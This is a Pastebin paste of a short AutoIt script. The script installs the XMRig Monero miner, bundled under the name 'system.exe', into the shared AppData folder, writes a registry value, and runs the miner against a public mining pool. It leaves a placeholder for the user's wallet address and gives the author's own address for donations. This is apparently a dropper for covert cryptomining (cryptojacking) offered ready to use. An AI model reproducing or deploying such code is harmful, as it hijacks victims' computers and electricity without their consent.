Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #AutoIt3Wrapper_UseX64=y
- $install=@AppDataCommonDir & "\"
- FileInstall("system.exe", "xmrig.exe")
- FileInstall("config.json", "config.json")
- FileCopy("xmrig.exe", $install)
- FileCopy("config.json", $install)
- RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MainFeature\APPDIR","Path",$install)
- RunWait($install&"\xmrig.exe --coin 'monero' -o xmrpool.eu:5555 -u [YOUR MONERO ADDRESS GOES HERE]-p x")
- MINE IS 4AWfZUDb33KGhiAr7bvuG86fZdQeSYahVhoFdMvwKscBatcyEQL52DVP8cwTWDUEGqWgXNg9Csnv59xP1q8znDBi8tPzXBQ [Feel free to donate]
Advertisement
Add Comment
Please, Sign In to add comment